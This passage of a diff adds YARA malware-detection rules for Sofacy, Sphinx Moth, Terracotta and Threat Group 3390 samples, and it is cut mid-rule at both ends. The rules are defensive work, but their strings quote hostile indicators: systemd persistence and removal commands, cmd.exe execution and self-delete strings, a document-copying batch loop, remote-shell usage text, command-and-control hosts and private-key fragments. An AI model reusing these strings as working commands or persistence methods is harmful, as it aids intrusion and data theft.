+		$x1 = "Your command not writed to pipe" fullword ascii
+		$x2 = "Terminal don`t started for executing command" fullword ascii
+		$x3 = "Command will have end with \\n" fullword ascii
+
+		$s1 = "WantedBy=multi-user.target' >> /usr/lib/systemd/system/" fullword ascii
+		$s2 = "Success execute command or long for waiting executing your command" fullword ascii
+		$s3 = "ls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"" fullword ascii
+		$s4 = "rm -f /usr/lib/systemd/system/" fullword ascii
+		$s5 = "ExecStart=" fullword ascii
+		$s6 = "<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>" fullword ascii
+	condition:
+		( uint16(0) == 0x457f and filesize < 500KB and 1 of ($x*) ) or
+		( 1 of ($x*) and 3 of ($s*) )
+}
+
+rule Sofacy_Fysbis_ELF_Backdoor_Gen2 {
+	meta:
+		description = "Detects Sofacy Fysbis Linux Backdoor"
+		author = "Florian Roth"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
+		date = "2016-02-13"
+		score = 80
+		hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
+		hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
+		hash3 = "fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61"
+	strings:
+		$s1 = "RemoteShell" ascii
+		$s2 = "basic_string::_M_replace_dispatch" fullword ascii
+		$s3 = "HttpChannel" ascii
+	condition:
+		uint16(0) == 0x457f and filesize < 500KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Sofacy_jun16.yar remnux-rules-0.0.4/yara/malware/APT_Sofacy_jun16.yar
--- remnux-rules-0.0.3/yara/malware/APT_Sofacy_jun16.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Sofacy_jun16.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,59 @@
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-06-14
+	Identifier: Sofacy June 2016
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule Sofacy_Jun16_Sample1 {
+	meta:
+		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
+		author = "Florian Roth"
+		reference = "http://goo.gl/mzAa97"
+		date = "2016-06-14"
+		score = 85
+		hash1 = "be1cfa10fcf2668ae01b98579b345ebe87dab77b6b1581c368d1aba9fd2f10a0"
+	strings:
+		$s1 = "clconfg.dll" fullword ascii
+		$s2 = "ASijnoKGszdpodPPiaoaghj8127391" fullword wide
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($s*) ) ) or ( all of them )
+}
+
+rule Sofacy_Jun16_Sample2 {
+	meta:
+		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
+		author = "Florian Roth"
+		reference = "http://goo.gl/mzAa97"
+		date = "2016-06-14"
+		score = 85
+		hash1 = "57d230ddaf92e2d0504e5bb12abf52062114fb8980c5ecc413116b1d6ffedf1b"
+		hash2 = "69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261"
+		hash3 = "aeeab3272a2ed2157ebf67f74c00fafc787a2b9bbaa17a03be1e23d4cb273632"
+	strings:
+		$x1 = "DGMNOEP" fullword ascii
+		$x2 = "/%s%s%s/?%s=" fullword ascii
+
+		$s1 = "Control Panel\\Dehttps=https://%snetwork.proxy.ht2" fullword ascii
+		$s2 = "http=http://%s:%Control Panel\\Denetwork.proxy.ht&ol1mS9" fullword ascii
+		$s3 = "svchost.dll" fullword wide
+		$s4 = "clconfig.dll" fullword wide
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 100KB and ( all of ($x*) ) ) or ( 3 of them )
+}
+
+rule Sofacy_Jun16_Sample3 {
+	meta:
+		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
+		author = "Florian Roth"
+		reference = "http://goo.gl/mzAa97"
+		date = "2016-06-14"
+		score = 85
+		hash1 = "c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785"
+	strings:
+		$s1 = "ASLIiasiuqpssuqkl713h" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 200KB and $s1
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Sofacy_xtunnel_bundestag.yar remnux-rules-0.0.4/yara/malware/APT_Sofacy_xtunnel_bundestag.yar
--- remnux-rules-0.0.3/yara/malware/APT_Sofacy_xtunnel_bundestag.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Sofacy_xtunnel_bundestag.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,102 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule apt_sofacy_xtunnel {
+    meta:
+        author = "Claudio Guarnieri"
+        description = "Sofacy Malware - German Bundestag"
+        score = 75
+    strings:
+        $xaps = ":\\PROJECT\\XAPS_"
+        $variant11 = "XAPS_OBJECTIVE.dll" $variant12 = "start"
+        $variant21 = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
+        $variant22 = "is you live?"
+        $mix1 = "176.31.112.10"
+        $mix2 = "error in select, errno %d" $mix3 = "no msg"
+        $mix4 = "is you live?"
+        $mix5 = "127.0.0.1"
+        $mix6 = "err %d"
+        $mix7 = "i`m wait"
+        $mix8 = "hello"
+        $mix9 = "OpenSSL 1.0.1e 11 Feb 2013" $mix10 = "Xtunnel.exe"
+    condition:
+        ((uint16(0) == 0x5A4D) or (uint16(0) == 0xCFD0)) and (($xaps) or (all of ($variant1*)) or (all of ($variant2*)) or (6 of ($mix*))) 
+}
+
+rule Sofacy_Bundestag_Winexe {
+    meta:
+        description = "Winexe tool used by Sofacy group in Bundestag APT"
+        author = "Florian Roth"
+        reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+        date = "2015-06-19"
+        hash = "5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d"
+        score = 70
+    strings:
+        $s1 = "\\\\.\\pipe\\ahexec" fullword ascii 
+        $s2 = "implevel" fullword ascii
+    condition:
+        uint16(0) == 0x5a4d and filesize < 115KB and all of them
+}
+
+rule Sofacy_Bundestag_Mal2 {
+    meta:
+        description = "Sofacy Group Malware Sample 2"
+        author = "Florian Roth"
+        reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+        date = "2015-06-19"
+        hash = "566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092"
+        score = 70
+    strings:
+        $x1 = "PROJECT\\XAPS_OBJECTIVE_DLL\\" ascii
+        $x2 = "XAPS_OBJECTIVE.dll" fullword ascii
+
+        $s1 = "i`m wait" fullword ascii 
+    condition:
+        uint16(0) == 0x5a4d and ( 1 of ($x*) ) and $s1
+}
+
+rule Sofacy_Bundestag_Mal3 {
+    meta:
+        description = "Sofacy Group Malware Sample 3"
+        author = "Florian Roth"
+        reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+        date = "2015-06-19"
+        hash = "5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1"
+        score = 70
+    strings:
+        $s1 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" fullword ascii 
+        $s2 = ".?AVAgentModuleRemoteKeyLogger@@" fullword ascii 
+        $s3 = "<font size=4 color=red>process isn't exist</font>" fullword ascii 
+        $s4 = "<font size=4 color=red>process is exist</font>" fullword ascii 
+        $s5 = ".winnt.check-fix.com" fullword ascii 
+        $s6 = ".update.adobeincorp.com" fullword ascii 
+        $s7 = ".microsoft.checkwinframe.com" fullword ascii
+        $s8 = "adobeincorp.com" fullword wide 
+        $s9 = "# EXC: HttpSender - Cannot create Get Channel!" fullword ascii 
+
+        $x1 = "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/" wide 
+        $x2 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2" wide 
+        $x3 = "C:\\Windows\\System32\\cmd.exe" fullword wide 
+    condition:
+        uint16(0) == 0x5a4d and filesize < 300KB and (
+            2 of ($s*) or 
+            ( 1 of ($s*) and all of ($x*) )
+        ) 
+}
+
+rule Sofacy_Bundestag_Batch {
+    meta:
+        description = "Sofacy Bundestags APT Batch Script"
+        author = "Florian Roth"
+        reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+        date = "2015-06-19"
+        score = 70
+    strings:
+        $s1 = "for %%G in (.pdf, .xls, .xlsx, .doc, .docx) do (" ascii 
+        $s2 = "cmd /c copy"
+        $s3 = "forfiles"
+    condition:
+        filesize < 10KB and all of them
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Sphinx_Moth.yar remnux-rules-0.0.4/yara/malware/APT_Sphinx_Moth.yar
--- remnux-rules-0.0.3/yara/malware/APT_Sphinx_Moth.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Sphinx_Moth.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,118 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+    Yara Rule Set
+    Author: Kudelski Security (modified by Florian Roth)
+    Reference: https://www.kudelskisecurity.com/sites/default/files/sphinx_moth_cfc_report.pdf
+    Date: 2015-11-23
+    Identifier: Sphinx Moth
+*/
+
+rule Sphinx_Moth_cudacrt { 
+    meta:
+        description = "sphinx moth threat group file cudacrt.dll" 
+        author = "Kudelski Security - Nagravision SA"
+        reference = "www.kudelskisecurity.com"
+        date = "2015-08-06"
+    strings:
+        $s0 = "HPSSOEx.dll" fullword wide
+        $s1 = "255.255.255.254" fullword wide
+        $s2 = "SOFTWARE\\SsoAuth\\Service" fullword wide
+
+        $op0 = { ff 15 5f de 00 00 48 8b f8 48 85 c0 75 0d 48 8b } /* Opcode */ 
+        $op1 = { 45 33 c9 4c 8d 05 a7 07 00 00 33 d2 33 c9 ff 15 } /* Opcode */ 
+        $op2 = { e8 7a 1c 00 00 83 f8 01 74 17 b9 03 } /* Opcode */
+    condition:
+        uint16(0) == 0x5a4d and filesize < 243KB and all of ($s*) and 1 of ($op*)
+}
+
+rule Sphinx_Moth_h2t { 
+    meta:
+        description = "sphinx moth threat group file h2t.dat" 
+        author = "Kudelski Security - Nagravision SA (modified by Florian Roth)" 
+        reference = "www.kudelskisecurity.com"
+        date = "2015-08-06"
+    strings:
+        $x1 = "%s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argX cmd]" fullword ascii 
+        
+        $s1 = "[-] Error in connection() %d - %s" fullword ascii
+        $s2 = "[-] Child process exit." fullword ascii
+        $s3 = "POST http://%s:%s/ HTTP/1.1" fullword ascii
+        $s4 = "pipe() to" fullword ascii
+        $s5 = "pipe() from" fullword ascii
+    condition:
+        uint16(0) == 0x5a4d and filesize < 156KB and ($x1 or all of ($s*))
+}
+
+rule Sphinx_Moth_iastor32 { 
+    meta:
+        description = "sphinx moth threat group file iastor32.exe" 
+        author = "Kudelski Security - Nagravision SA"
+        reference = "www.kudelskisecurity.com"
+        date = "2015-08-06"
+    strings:
+        $s0 = "MIIEpQIBAAKCAQEA4lSvv/W1Mkz38Q3z+EzJBZRANzKrlxeE6/UXWL67YtokF2nN" fullword ascii /* private key */
+        $s1 = "iAeS3CCA4wli6+9CIgX8SAiXd5OezHvI1jza61z/flsqcC1IP//gJVt16nRx3s9z" fullword ascii /* private key */
+    condition:
+        uint16(0) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule Sphinx_Moth_kerberos32 {
+    meta:
+        description = "sphinx moth threat group file kerberos32.dll" 
+        author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
+        reference = "www.kudelskisecurity.com"
+        date = "2015-08-06"
+    strings:
+        $x1 = "%WINDIR%\\ativpsrz.bin" fullword ascii
+        $x2 = "%WINDIR%\\ativpsrn.bin" fullword ascii
+        $x3 = "kerberos32.dll" fullword wide
+        $x4 = "KERBEROS64.dll" fullword ascii
+        $x5 = "kerberos%d.dll" fullword ascii
+
+        $s1 = "\\\\.\\pipe\\lsassp" fullword ascii
+        $s2 = "LSASS secure pipe" fullword ascii /* PEStudio Blacklist: strings */ 
+        $s3 = "NullSessionPipes" fullword ascii /* PEStudio Blacklist: strings */ 
+        $s4 = "getlog" fullword ascii
+        $s5 = "startlog" fullword ascii /* PEStudio Blacklist: strings */
+        $s6 = "stoplog" fullword ascii /* PEStudio Blacklist: strings */
+        $s7 = "Unsupported OS (%d)" fullword ascii /* PEStudio Blacklist: strings */ 
+        $s8 = "Unsupported OS (%s)" fullword ascii /* PEStudio Blacklist: strings */
+    condition:
+        uint16(0) == 0x5a4d and filesize < 300KB and (2 of ($x*) or all of ($s*))
+}
+
+rule Sphinx_Moth_kerberos64 { 
+    meta:
+        description = "sphinx moth threat group file kerberos64.dll" 
+        author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
+        reference = "www.kudelskisecurity.com"
+        date = "2015-08-06"
+    strings:
+        $s0 = "KERBEROS64.dll" fullword ascii
+        $s1 = "zeSecurityDescriptor" fullword ascii
+        $s2 = "SpGetInfo" fullword ascii
+        $s3 = "SpShutdown" fullword ascii
+        $op0 = { 75 05 e8 6a c7 ff ff 48 8b 1d 47 d6 00 00 33 ff } /* Opcode */ 
+        $op1 = { 48 89 05 0c 2b 01 00 c7 05 e2 29 01 00 09 04 00 } /* Opcode */ 
+        $op2 = { 48 8d 3d e3 ee 00 00 ba 58 } /* Opcode */
+    condition:
+        uint16(0) == 0x5a4d and filesize < 406KB and all of ($s*) and 1 of ($op*)
+}
+
+rule Sphinx_Moth_nvcplex { 
+    meta:
+        description = "sphinx moth threat group file nvcplex.dat" 
+        author = "Kudelski Security - Nagravision SA"
+        reference = "www.kudelskisecurity.com"
+        date = "2015-08-06"
+    strings:
+        $s0 = "mshtaex.exe" fullword wide
+        $op0 = { 41 8b cc 44 89 6c 24 28 48 89 7c 24 20 ff 15 d3 } /* Opcode */ 
+        $op1 = { 48 3b 0d ad 8f 00 00 74 05 e8 ba f5 ff ff 48 8b } /* Opcode */ 
+        $op2 = { 8b ce e8 49 47 00 00 90 8b 43 04 89 05 93 f1 00 } /* Opcode */
+    condition:
+        uint16(0) == 0x5a4d and filesize < 214KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Terracota_Liudoor.yar remnux-rules-0.0.4/yara/malware/APT_Terracota_Liudoor.yar
--- remnux-rules-0.0.3/yara/malware/APT_Terracota_Liudoor.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Terracota_Liudoor.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,31 @@
+
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule liudoor
+{
+meta:
+        author = "RSA FirstWatch"
+        date = "2015-07-23"
+        description = "Detects Liudoor daemon backdoor"
+        hash0 = "78b56bc3edbee3a425c96738760ee406"
+        hash1 = "5aa0510f6f1b0e48f0303b9a4bfc641e"
+        hash2 = "531d30c8ee27d62e6fbe855299d0e7de"
+        hash3 = "2be2ac65fd97ccc97027184f0310f2f3"
+        hash4 = "6093505c7f7ec25b1934d3657649ef07"
+        type = "Win32 DLL"
+
+strings:
+        $string0 = "Succ"
+        $string1 = "Fail"
+        $string2 = "pass"
+        $string3 = "exit"
+        $string4 = "svchostdllserver.dll"
+        $string5 = "L$,PQR"
+        $string6 = "0/0B0H0Q0W0k0"
+        $string7 = "QSUVWh"
+        $string8 = "Ht Hu["
+condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Terracota.yar remnux-rules-0.0.4/yara/malware/APT_Terracota.yar
--- remnux-rules-0.0.3/yara/malware/APT_Terracota.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Terracota.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,102 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+
+/* Rule Set ----------------------------------------------------------------- */
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-08-04
+	Identifier: Terracotta APT
+	Comment: Reduced Rule Set
+*/
+rule Apolmy_Privesc_Trojan {
+	meta:
+		description = "Apolmy Privilege Escalation Trojan used in APT Terracotta"
+		author = "Florian Roth"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		date = "2015-08-04"
+		score = 80
+		hash = "d7bd289e6cee228eb46a1be1fcdc3a2bd5251bc1eafb59f8111756777d8f373d"
+	strings:
+		$s1 = "[%d] Failed, %08X" fullword ascii
+		$s2 = "[%d] Offset can not fetched." fullword ascii
+		$s3 = "PowerShadow2011" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule Mithozhan_Trojan {
+	meta:
+		description = "Mitozhan Trojan used in APT Terracotta"
+		author = "Florian Roth"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		date = "2015-08-04"
+		score = 70
+		hash = "8553b945e2d4b9f45c438797d6b5e73cfe2899af1f9fd87593af4fd7fb51794a"
+	strings:
+		$s1 = "adbrowser" fullword wide 
+		$s2 = "IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==" fullword ascii
+		$s3 = "EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule RemoteExec_Tool {
+	meta:
+		description = "Remote Access Tool used in APT Terracotta"
+		author = "Florian Roth"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		date = "2015-08-04"
+		hash = "a550131e106ff3c703666f15d55d9bc8c816d1cb9ac1b73c2e29f8aa01e53b78"
+	strings:
+		$s0 = "cmd.exe /q /c \"%s\"" fullword ascii 
+		$s1 = "\\\\.\\pipe\\%s%s%d" fullword ascii 
+		$s2 = "This is a service executable! Couldn't start directly." fullword ascii 
+		$s3 = "\\\\.\\pipe\\TermHlp_communicaton" fullword ascii 
+		$s4 = "TermHlp_stdout" fullword ascii 
+		$s5 = "TermHlp_stdin" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 75KB and 4 of ($s*)
+}
+
+/* Super Rules ------------------------------------------------------------- */
+
+rule LiuDoor_Malware_1 {
+	meta:
+		description = "Liudoor Trojan used in Terracotta APT"
+		author = "Florian Roth"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		date = "2015-08-04"
+		score = 70
+		super_rule = 1
+		hash1 = "deed6e2a31349253143d4069613905e1dfc3ad4589f6987388de13e33ac187fc"
+		hash2 = "4575e7fc8f156d1d499aab5064a4832953cd43795574b4c7b9165cdc92993ce5"
+		hash3 = "ad1a507709c75fe93708ce9ca1227c5fefa812997ed9104ff9adfec62a3ec2bb"
+	strings:
+		$s1 = "svchostdllserver.dll" fullword ascii 
+		$s2 = "SvcHostDLL: RegisterServiceCtrlHandler %S failed" fullword ascii 
+		$s3 = "\\nbtstat.exe" fullword ascii
+		$s4 = "DataVersionEx" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 150KB and all of them
+}
+
+rule LiuDoor_Malware_2 {
+	meta:
+		description = "Liudoor Trojan used in Terracotta APT"
+		author = "Florian Roth"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		date = "2015-08-04"
+		score = 70
+		super_rule = 1
+		hash1 = "f3fb68b21490ded2ae7327271d3412fbbf9d705c8003a195a705c47c98b43800"
+		hash2 = "e42b8385e1aecd89a94a740a2c7cd5ef157b091fabd52cd6f86e47534ca2863e"
+	strings:
+		$s0 = "svchostdllserver.dll" fullword ascii 
+		$s1 = "Lpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCC" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 100KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_threatgroup_3390.yar remnux-rules-0.0.4/yara/malware/APT_threatgroup_3390.yar
--- remnux-rules-0.0.3/yara/malware/APT_threatgroup_3390.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_threatgroup_3390.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,311 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-08-06
+	Identifier: Threat Group 3390
+*/
+
+rule HttpBrowser_RAT_dropper_Gen1 {
+	meta:
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+		author = "Florian Roth"
+		reference = "http://snip.ly/giNB"
+		date = "2015-08-06"
+		score = 70
+		hash1 = "808de72f1eae29e3c1b2c32be1b84c5064865a235866edf5e790d2a7ba709907"
+		hash2 = "f6f966d605c5e79de462a65df437ddfca0ad4eb5faba94fc875aba51a4b894a7"
+		hash3 = "f424965a35477d822bbadb821125995616dc980d3d4f94a68c87d0cd9b291df9"
+		hash4 = "01441546fbd20487cb2525a0e34e635eff2abe5c3afc131c7182113220f02753"
+		hash5 = "8cd8159f6e4689f572e2087394452e80e62297af02ca55fe221fe5d7570ad47b"
+		hash6 = "10de38419c9a02b80ab7bf2f1f1f15f57dbb0fbc9df14b9171dc93879c5a0c53"
+		hash7 = "c2fa67e970d00279cec341f71577953d49e10fe497dae4f298c2e9abdd3a48cc"
+	strings:
+		$x1 = "1001=cmd.exe" fullword ascii 
+		$x2 = "1003=ShellExecuteA" fullword ascii 
+		$x3 = "1002=/c del /q %s" fullword ascii
+		$x4 = "1004=SetThreadPriority" fullword ascii
+
+		/* $s1 = "pnipcn.dllUT" fullword ascii
+		$s2 = "ssonsvr.exeUT" fullword ascii
+		$s3 = "navlu.dllUT" fullword ascii
+		$s4 = "@CONOUT$" fullword wide 
+		$s5 = "VPDN_LU.exeUT" fullword ascii
+		$s6 = "msi.dll.urlUT" fullword ascii
+		$s7 = "setup.exeUT" fullword ascii 
+		$s8 = "pnipcn.dll.urlUT" fullword ascii
+		$s9 = "ldvpreg.exeUT" fullword ascii */
+
+		$op0 = { e8 71 11 00 00 83 c4 10 ff 4d e4 8b f0 78 07 8b } /* Opcode */
+		$op1 = { e8 85 34 00 00 59 59 8b 86 b4 } /* Opcode */
+		$op2 = { 8b 45 0c 83 38 00 0f 84 97 } /* Opcode */
+		$op3 = { 8b 45 0c 83 38 00 0f 84 98 } /* Opcode */
+		$op4 = { 89 7e 0c ff 15 a0 50 40 00 59 8b d8 6a 20 59 8d } /* Opcode */
+		$op5 = { 56 8d 85 cd fc ff ff 53 50 88 9d cc fc ff ff e8 } /* Opcode */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 400KB and all of ($x*) and 1 of ($op*)
+}
+
+rule HttpBrowser_RAT_Sample1 {
+	meta:
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com"
+		author = "Florian Roth"
+		reference = "http://snip.ly/giNB"
+		date = "2015-08-06"
+		score = 80
+		hash1 = "be334d1f8fa65a723af65200a166c2bbdb06690c8b30fafe772600e4662fc68b"
+		hash2 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
+	strings:
+		$s0 = "update.hancominc.com" fullword wide 
+	condition:
+		uint16(0) == 0x5a4d and filesize < 100KB and $s0
+}
+
+rule HttpBrowser_RAT_Sample2 {
+	meta:
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample"
+		author = "Florian Roth"
+		reference = "http://snip.ly/giNB"
+		date = "2015-08-06"
+		score = 80
+		hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
+	strings:
+		$s0 = "nKERNEL32.DLL" fullword wide
+		$s1 = "WUSER32.DLL" fullword wide
+		$s2 = "mscoree.dll" fullword wide
+		$s3 = "VPDN_LU.exeUT" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 250KB and all of them
+}
+
+rule HttpBrowser_RAT_Gen {
+	meta:
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Generic"
+		author = "Florian Roth"
+		reference = "http://snip.ly/giNB"
+		date = "2015-08-06"
+		score = 90
+		hash1 = "0299493ccb175d452866f5e21d023d3e92cd8d28452517d1d19c0f05f2c5ca27"
+		hash2 = "065d055a90da59b4bdc88b97e537d6489602cb5dc894c5c16aff94d05c09abc7"
+		hash3 = "05c7291db880f94c675eea336ecd66338bd0b1d49ad239cc17f9df08106e6684"
+		hash4 = "07133f291fe022cd14346cd1f0a649aa2704ec9ccadfab809ca9c48b91a7d81b"
+		hash5 = "0f8893e87ddec3d98e39a57f7cd530c28e36d596ea0a1d9d1e993dc2cae0a64d"
+		hash6 = "108e6633744da6efe773eb78bd0ac804920add81c3dde4b26e953056ac1b26c5"
+		hash7 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
+		hash8 = "1277ede988438d4168bb5b135135dd3b9ae7d9badcdf1421132ca4692dd18386"
+		hash9 = "19be90c152f7a174835fd05a0b6f722e29c648969579ed7587ae036679e66a7b"
+		hash10 = "1e7133bf5a9fe5e462321aafc2b7770b8e4183a66c7fef14364a0c3f698a29af"
+		hash11 = "2264e5e8fcbdcb29027798b200939ecd8d1d3ad1ef0aef2b8ce7687103a3c113"
+		hash12 = "2a1bdeb0a021fb0bdbb328bd4b65167d1f954c871fc33359cb5ea472bad6e13e"
+		hash13 = "259a2e0508832d0cf3f4f5d9e9e1adde17102d2804541a9587a9a4b6f6f86669"
+		hash14 = "240d9ce148091e72d8f501dbfbc7963997d5c2e881b4da59a62975ddcbb77ca2"
+		hash15 = "211a1b195cf2cc70a2caf8f1aafb8426eb0e4bae955e85266490b12b5322aa16"
+		hash16 = "2d25c6868c16085c77c58829d538b8f3dbec67485f79a059f24e0dce1e804438"
+		hash17 = "2d932d764dd9b91166361d8c023d64a4480b5b587a6087b0ce3d2ac92ead8a7d"
+		hash18 = "3556722d9aa37beadfa6ba248a66576f767e04b09b239d3fb0479fa93e0ba3fd"
+		hash19 = "365e1d4180e93d7b87ba28ce4369312cbae191151ac23ff4a35f45440cb9be48"
+		hash20 = "36c49f18ce3c205152eef82887eb3070e9b111d35a42b534b2fb2ee535b543c0"
+		hash21 = "3eeb1fd1f0d8ab33f34183893c7346ddbbf3c19b94ba3602d377fa2e84aaad81"
+		hash22 = "3fa8d13b337671323e7fe8b882763ec29b6786c528fa37da773d95a057a69d9a"
+	strings:
+		$s0 = "%d|%s|%04d/%02d/%02d %02d:%02d:%02d|%ld|%d" fullword wide 
+		$s1 = "HttpBrowser/1.0" fullword wide
+		$s2 = "set cmd : %s" ascii fullword
+		$s3 = "\\config.ini" wide fullword
+	condition:
+		uint16(0) == 0x5a4d and filesize < 45KB and filesize > 20KB and all of them
+}
+
+rule PlugX_NvSmartMax_Gen {
+	meta:
+		description = "Threat Group 3390 APT Sample - PlugX NvSmartMax Generic"
+		author = "Florian Roth"
+		reference = "http://snip.ly/giNB"
+		date = "2015-08-06"
+		score = 70
+		hash1 = "718fc72942b9b706488575c0296017971170463f6f40fa19b08fc84b79bf0cef"
+		hash2 = "1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0"
+		hash3 = "555952aa5bcca4fa5ad5a7269fece99b1a04816d104ecd8aefabaa1435f65fa5"
+		hash4 = "71f7a9da99b5e3c9520bc2cc73e520598d469be6539b3c243fb435fe02e44338"
+		hash5 = "65bbf0bd8c6e1ccdb60cf646d7084e1452cb111d97d21d6e8117b1944f3dc71e"
+	strings:
+		$s0 = "NvSmartMax.dll" fullword ascii
+		$s1 = "NvSmartMax.dll.url" fullword ascii
+		$s2 = "Nv.exe" fullword ascii
+		$s4 = "CryptProtectMemory failed" fullword ascii 
+		$s5 = "CryptUnprotectMemory failed" fullword ascii 
+		$s7 = "r%.*s(%d)%s" fullword wide
+		$s8 = " %s CRC " fullword wide
+
+		$op0 = { c6 05 26 49 42 00 01 eb 4a 8d 85 00 f8 ff ff 50 } /* Opcode */
+		$op1 = { 8d 85 c8 fe ff ff 50 8d 45 c8 50 c6 45 47 00 e8 } /* Opcode */
+		$op2 = { e8 e6 65 00 00 50 68 10 43 41 00 e8 56 84 00 00 } /* Opcode */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 800KB and all of ($s*) and 1 of ($op*)
+}
+
+rule HttpBrowser_RAT_dropper_Gen2 {
+	meta:
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+		author = "Florian Roth"
+		reference = "http://snip.ly/giNB"
+		date = "2015-08-06"
+		score = 70
